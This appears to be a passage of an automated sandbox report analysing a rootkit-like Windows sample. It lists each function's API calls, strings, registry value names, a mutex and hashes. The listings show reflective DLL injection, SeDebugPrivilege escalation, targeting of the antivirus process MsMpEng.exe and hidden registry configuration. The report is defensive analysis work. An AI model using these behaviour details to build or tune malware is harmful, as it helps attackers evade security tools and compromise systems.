_CallSETranslator.LIBVCRUNTIME ref: 0000026504E79BA7

Strings

RCC, xrefs: 0000026504E79B77
MOC, xrefs: 0000026504E79B6F

Memory Dump Source

Source File: 00000025.00000003.2595945338.0000026504E70000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026504E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_3_26504e70000_conhost.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 7cb371ebe1f38dd836efb8d698b7931f5380c708502e002ecfd015cff438381b
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 4661B172508FC5C5EB70DF15E54439ABBA0FB99BA8F048215EB9807B9ADB7DC190CB01

Function 0000026504EA25DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000026504EA26C2
StrCpyW.SHLWAPI ref: 0000026504EA26D9

Strings

\\.\pipe\, xrefs: 0000026504EA26CD

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 95646e58848f0ea7e05806d1f3e8b0a284e4bff4d256d04cc7f37b397110c7b1
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 01513936204FA3C1EA64CE35A45C3AA6B51FBCC780F540065EF4963B99DE3BDA24C742

Function 0000026504EB2660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000026504EB2778
GetLastError.KERNEL32 ref: 0000026504EB279D

Strings

U, xrefs: 0000026504EB2722

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 95c7de3d60571f03dbf528cd1ef22946b560d1cd9ac4b427295b98200fee9b4c
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: EA411532625EA1C6E720DF65E44C79AB7A0FB8C784F800121EF4D87758EB39C405CB85

Function 0000026504EA9178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000026504EA91C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,0000026504EA87F7), ref: 0000026504EA9209

Strings

csm, xrefs: 0000026504EA91F6

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: f2eb958866feec674a9ec961b9c03993d6b81571bd2190b20af915db2189d399
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 1A115B32214F9082EB61CB25F40825AB7E1F788B88F594620EE8D07B69DF3DC561CB00

Function 0000026504EA1D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000026504EA1D69
HeapAlloc.KERNEL32 ref: 0000026504EA1D77
GetProcessHeap.KERNEL32 ref: 0000026504EA1D9C
HeapFree.KERNEL32 ref: 0000026504EA1DAA

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: cb74864c4254a2cdae2ea87dbcb3073e42bb13387c9c6a3b5c5a833ca359010a
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: F711C031A01F91D1EA15CB66A80825AB7B0F78CFC4F584124DE4E53724EF39D452C340

Function 0000026504EA1264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000026504EA126A
HeapAlloc.KERNEL32 ref: 0000026504EA1279
GetProcessHeap.KERNEL32 ref: 0000026504EA1293
HeapAlloc.KERNEL32 ref: 0000026504EA12A4

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 8f5e8d102bbf6be927a1a1bf0355cd3e4e194ff6a5f4c30ac032e69cbbfc5569
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: E5E03231A11E15EAE72ACB62D80834A36E1EB8CB09F488124C90907360EF7EC49D8B81

Function 0000026504EA1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000026504EA1006
HeapAlloc.KERNEL32 ref: 0000026504EA1015
GetProcessHeap.KERNEL32 ref: 0000026504EA1028
HeapAlloc.KERNEL32 ref: 0000026504EA1037

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 1ac6745ab46a21a9a9ed76188113291936cec1327d1a06f7d14d0655b2e7e7b3
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: 20E0ED71621D15EAE71ADB62D80825A76A1FB8CB19F448164C90907310EE39849D9751

Analysis Process: dllhost.exePID: 2844, Parent PID: 552COMMON

Executed Functions

Function 0000000140002D4C Relevance: 91.3, APIs: 39, Strings: 13, Instructions: 269
registrymemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D6C
Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D7C
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D87
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DA5
OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DB5
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DCF
LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DE6
AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E20
GetLastError.KERNEL32 ref: 0000000140002E2A
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E33
RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E5C
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E8C
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBC
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ED0
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EDE
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EF1
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EFF
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F2E
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F5E
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F70
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F76

Part of subcall function 000000014000200C: GetProcessHeap.KERNEL32(?,?,00000000,0000000140002F83), ref: 0000000140002021
Part of subcall function 000000014000200C: HeapAlloc.KERNEL32(?,?,00000000,0000000140002F83), ref: 0000000140002032
Part of subcall function 000000014000200C: OpenProcess.KERNEL32 ref: 0000000140002079
Part of subcall function 000000014000200C: TerminateProcess.KERNEL32 ref: 000000014000208C
Part of subcall function 000000014000200C: CloseHandle.KERNEL32 ref: 0000000140002095
Part of subcall function 000000014000200C: GetProcessHeap.KERNEL32 ref: 00000001400020A5

RegCreateKeyExW.KERNELBASE ref: 0000000140002FB2
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 0000000140002FD9
RegSetKeySecurity.KERNELBASE ref: 0000000140002FF2
LocalFree.KERNEL32 ref: 0000000140002FFC
RegCreateKeyExW.KERNELBASE ref: 0000000140003032
GetCurrentProcessId.KERNEL32 ref: 000000014000303C
RegSetValueExW.KERNELBASE ref: 0000000140003063
RegCloseKey.KERNELBASE ref: 000000014000306D
RegCloseKey.ADVAPI32 ref: 0000000140003077
CreateThread.KERNELBASE ref: 0000000140003098
GetProcessHeap.KERNEL32 ref: 000000014000309E
HeapAlloc.KERNEL32 ref: 00000001400030AD
CreateThread.KERNELBASE ref: 00000001400030DB
CreateThread.KERNELBASE ref: 00000001400030FC
ShellExecuteW.SHELL32 ref: 0000000140003136
GetProcessHeap.KERNEL32 ref: 0000000140003196
HeapFree.KERNEL32 ref: 00000001400031A4
SleepEx.KERNELBASE ref: 00000001400031AD

Strings

Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d, xrefs: 0000000140002D5E
kernel32.dll, xrefs: 0000000140002D99
?, xrefs: 0000000140003026
$rbx-dll64, xrefs: 0000000140002EAA, 0000000140002F43
ntdll.dll, xrefs: 0000000140002D8D
SOFTWARE, xrefs: 0000000140002E52
SOFTWARE\$rbx-config, xrefs: 0000000140002F91
$rbx-dll32, xrefs: 0000000140002E7A, 0000000140002F09
svc64, xrefs: 0000000140003046
SeDebugPrivilege, xrefs: 0000000140002DDF
D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), xrefs: 0000000140002FD2
open, xrefs: 0000000140003117
pid, xrefs: 000000014000300F

Memory Dump Source

Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Heap$CloseValue$CreateOpen$AllocQuery$CurrentHandleSecurityThread$DescriptorFreeSleepToken$AdjustConvertErrorExecuteLastLocalLookupMutexPrivilegePrivilegesShellStringTerminate
String ID: $rbx-dll32$$rbx-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d$SOFTWARE$SOFTWARE\$rbx-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
API String ID: 2725631067-1382791509
Opcode ID: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
Instruction ID: 11cca5996524c372b97bd826982d2baaf99c89fd62df68e9b01c6f7d22bdc91e
Opcode Fuzzy Hash: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
Instruction Fuzzy Hash: 8DD1E0F6600A4086EB26DF22F8547DA27A5FB8CBD9F404116FB4A43A79DF38C589C744

Function 0000000140001868 Relevance: 58.0, APIs: 29, Strings: 4, Instructions: 287
memorystringnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32 ref: 000000014000189E
IsWow64Process.KERNEL32 ref: 00000001400018BA
CloseHandle.KERNELBASE ref: 00000001400018DE
OpenProcess.KERNEL32 ref: 0000000140001939
OpenProcess.KERNEL32 ref: 0000000140001958
K32GetModuleFileNameExW.KERNEL32 ref: 0000000140001979
PathFindFileNameW.SHLWAPI ref: 0000000140001987
lstrlenW.KERNEL32 ref: 0000000140001993
StrCpyW.SHLWAPI ref: 00000001400019AA
CloseHandle.KERNEL32 ref: 00000001400019B6
StrCmpIW.SHLWAPI ref: 00000001400019EA
NtQueryInformationProcess.NTDLL ref: 0000000140001A1B
OpenProcessToken.ADVAPI32 ref: 0000000140001A43
GetTokenInformation.KERNELBASE ref: 0000000140001A6F
GetLastError.KERNEL32 ref: 0000000140001A79
LocalAlloc.KERNEL32 ref: 0000000140001A8C
GetTokenInformation.KERNELBASE ref: 0000000140001AB8
GetSidSubAuthorityCount.ADVAPI32 ref: 0000000140001AC5
GetSidSubAuthority.ADVAPI32 ref: 0000000140001AD4
LocalFree.KERNEL32 ref: 0000000140001AEC
CloseHandle.KERNEL32 ref: 0000000140001B00
StrStrA.SHLWAPI ref: 0000000140001BAB
VirtualAllocEx.KERNEL32 ref: 0000000140001C15
WriteProcessMemory.KERNELBASE ref: 0000000140001C38
WaitForSingleObject.KERNEL32 ref: 0000000140001C79
GetExitCodeThread.KERNEL32 ref: 0000000140001C8F
VirtualFreeEx.KERNELBASE ref: 0000000140001CB1
CloseHandle.KERNELBASE ref: 0000000140001CC2
CloseHandle.KERNEL32 ref: 0000000140001CCB

Strings

@, xrefs: 0000000140001C08
ReflectiveDllMain, xrefs: 0000000140001BA1
MSBuild.exe, xrefs: 00000001400019D4
MsMpEng.exe, xrefs: 00000001400019C1

Memory Dump Source

Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd

Similarity

API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
API String ID: 2456419452-2628171563
Opcode ID: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
Instruction ID: 2a11411cfc832b8c6424502e8b4f1e91c9a7b64b89c06221b22f1678334b3336
Opcode Fuzzy Hash: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
Instruction Fuzzy Hash: E6C15BB1700A8186EB66DF23B8907EA27A5FB8CBC4F444125EF4A477A5EF38C945C740

Function 0000000140003204 Relevance: 47.5, APIs: 20, Strings: 7, Instructions: 236
registrymemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32 ref: 000000014000327C

Part of subcall function 0000000140001868: OpenProcess.KERNEL32 ref: 000000014000189E
Part of subcall function 0000000140001868: IsWow64Process.KERNEL32 ref: 00000001400018BA
Part of subcall function 0000000140001868: CloseHandle.KERNELBASE ref: 00000001400018DE
Part of subcall function 0000000140001868: OpenProcess.KERNEL32 ref: 0000000140001939
Part of subcall function 0000000140001868: OpenProcess.KERNEL32 ref: 0000000140001958
Part of subcall function 0000000140001868: K32GetModuleFileNameExW.KERNEL32 ref: 0000000140001979
Part of subcall function 0000000140001868: PathFindFileNameW.SHLWAPI ref: 0000000140001987
Part of subcall function 0000000140001868: lstrlenW.KERNEL32 ref: 0000000140001993
Part of subcall function 0000000140001868: StrCpyW.SHLWAPI ref: 00000001400019AA
Part of subcall function 0000000140001868: CloseHandle.KERNEL32 ref: 00000001400019B6
Part of subcall function 0000000140001868: StrCmpIW.SHLWAPI ref: 00000001400019EA

Part of subcall function 0000000140001868: NtQueryInformationProcess.NTDLL ref: 0000000140001A1B
Part of subcall function 0000000140001868: OpenProcessToken.ADVAPI32 ref: 0000000140001A43
Part of subcall function 0000000140001868: GetTokenInformation.KERNELBASE ref: 0000000140001A6F
Part of subcall function 0000000140001868: GetLastError.KERNEL32 ref: 0000000140001A79
Part of subcall function 0000000140001868: LocalAlloc.KERNEL32 ref: 0000000140001A8C
Part of subcall function 0000000140001868: GetTokenInformation.KERNELBASE ref: 0000000140001AB8
Part of subcall function 0000000140001868: GetSidSubAuthorityCount.ADVAPI32 ref: 0000000140001AC5
Part of subcall function 0000000140001868: GetSidSubAuthority.ADVAPI32 ref: 0000000140001AD4
Part of subcall function 0000000140001868: LocalFree.KERNEL32 ref: 0000000140001AEC
Part of subcall function 0000000140001868: CloseHandle.KERNEL32 ref: 0000000140001B00
Part of subcall function 0000000140001868: StrStrA.SHLWAPI ref: 0000000140001BAB

RegOpenKeyExW.ADVAPI32 ref: 000000014000330D
RegDeleteValueW.ADVAPI32 ref: 0000000140003325
RegDeleteValueW.ADVAPI32 ref: 0000000140003339
RegDeleteValueW.ADVAPI32 ref: 000000014000334D
ExitProcess.KERNEL32 ref: 0000000140003384
GetProcessHeap.KERNEL32 ref: 000000014000338B
HeapAlloc.KERNEL32 ref: 000000014000339E
K32EnumProcesses.KERNEL32 ref: 00000001400033BB
ExitProcess.KERNEL32 ref: 0000000140003479

Strings

$rbx-stager, xrefs: 000000014000331E
$rbx-svc64, xrefs: 000000014000335F
$rbx-svc32, xrefs: 0000000140003353
$rbx-dll32, xrefs: 0000000140003332
$rbx-dll64, xrefs: 0000000140003346
SOFTWARE, xrefs: 00000001400032FF
open, xrefs: 000000014000357B

Memory Dump Source

Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeLastModulePathProcessesQueryReadWow64lstrlen
String ID: $rbx-dll32$$rbx-dll64$$rbx-stager$$rbx-svc32$$rbx-svc64$SOFTWARE$open
API String ID: 4225498131-1538754800
Opcode ID: 3407ad9d7cfcb5975a2e83ecadca061c5ac97008c8c89d8cb2dbdbb065867439
Instruction ID: 6e35c32a62d70e7d93f4307674840714c013e8363098979e1a8d92760cac109a
Opcode Fuzzy Hash: 3407ad9d7cfcb5975a2e83ecadca061c5ac97008c8c89d8cb2dbdbb065867439
Instruction Fuzzy Hash: 00B1EAF1204A8196EB77DF27B8643E923A9F74D7C4F408125BB4A47AB9DF398645C700

Function 0000000140001CF0 Relevance: 19.6, APIs: 13, Instructions: 131
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000000140001D23
HeapAlloc.KERNEL32 ref: 0000000140001D36
GetProcessHeap.KERNEL32 ref: 0000000140001D44
HeapAlloc.KERNEL32 ref: 0000000140001D55
K32EnumProcesses.KERNEL32 ref: 0000000140001D6F
OpenProcess.KERNEL32 ref: 0000000140001D9D
K32EnumProcessModulesEx.KERNEL32 ref: 0000000140001DCA
ReadProcessMemory.KERNEL32 ref: 0000000140001E01
CloseHandle.KERNELBASE ref: 0000000140001E46
GetProcessHeap.KERNEL32 ref: 0000000140001E58
HeapFree.KERNEL32 ref: 0000000140001E66
GetProcessHeap.KERNEL32 ref: 0000000140001E6C
RtlFreeHeap.NTDLL ref: 0000000140001E7A

Memory Dump Source

Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
String ID:
API String ID: 4084875642-0
Opcode ID: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
Instruction ID: 4f27d05859a20aa5d5a2c4d21673197ed0af44fd7722cf910b4e92e6674c13e6
Opcode Fuzzy Hash: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
Instruction Fuzzy Hash: AB5159B27116808AEB66DF63F8587EA22A1B78DBC4F844025EF5957764DF38C585C600

Function 0000000140002300 Relevance: 9.1, APIs: 6, Instructions: 82
memorypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 000000014000234F
SetEntriesInAclW.ADVAPI32 ref: 0000000140002397
LocalAlloc.KERNEL32 ref: 00000001400023A7
InitializeSecurityDescriptor.ADVAPI32 ref: 00000001400023BB
SetSecurityDescriptorDacl.ADVAPI32 ref: 00000001400023D2
CreateNamedPipeW.KERNELBASE ref: 0000000140002413

Memory Dump Source

Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd

Similarity

API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
String ID:
API String ID: 3197395349-0
Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44

Function 000000014000151C Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000000140001527
HeapAlloc.KERNEL32 ref: 0000000140001536

Part of subcall function 0000000140001220: GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001226
Part of subcall function 0000000140001220: HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001235
Part of subcall function 0000000140001220: GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 000000014000124F
Part of subcall function 0000000140001220: HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001260

Part of subcall function 0000000140001000: GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001006
Part of subcall function 0000000140001000: HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001015
Part of subcall function 0000000140001000: GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001028
Part of subcall function 0000000140001000: HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001037

RegOpenKeyExW.ADVAPI32 ref: 00000001400015A6
RegOpenKeyExW.ADVAPI32 ref: 00000001400015D3
RegCloseKey.ADVAPI32 ref: 00000001400015ED
RegOpenKeyExW.ADVAPI32 ref: 000000014000160D
RegCloseKey.KERNELBASE ref: 0000000140001628
RegOpenKeyExW.ADVAPI32 ref: 0000000140001648
RegCloseKey.ADVAPI32 ref: 0000000140001663
RegOpenKeyExW.ADVAPI32 ref: 0000000140001683
RegCloseKey.ADVAPI32 ref: 000000014000169E
